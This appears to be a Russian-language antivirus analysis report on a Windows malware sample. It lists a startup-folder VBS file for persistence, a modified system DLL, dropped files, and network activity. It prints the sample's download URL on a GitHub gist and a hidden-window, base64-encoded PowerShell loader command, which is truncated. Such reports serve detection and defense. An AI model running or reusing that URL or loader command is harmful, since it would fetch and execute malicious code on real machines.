Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\system33.vbs
Изменяет следующие исполняемые системные файлы
- %WINDIR%\serviceprofiles\localservice\appdata\roaming\microsoft\upnp device host\upnphost\udhisapi.dll
Вредоносные функции
Загружает
- https://gist.githubusercontent.com/alheany77/8edb53bb9913842925abb4d86dd0d00d/raw/79190c41ee268a9069b7f339e61cf02b67ae5ffe/vid.txt
Изменения в файловой системе
Создает следующие файлы
- <LS_APPDATA>\jemfb3oalvv.mp4
- <LS_APPDATA>\jemfb3oplay.vbs
Сетевая активность
UDP
- '23#.#55.255.250':1900
Другое
Ищет следующие окна
- ClassName: '\MSITPro::EventQueue' WindowName: ''
- ClassName: 'Type32_Main_Window' WindowName: ''
- ClassName: 'WMPlayerApp' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "<LS_APPDATA>\JEmfB3oplay.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAt...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles(x86)%\windows media player\wmplayer.exe' /Play -Embedding
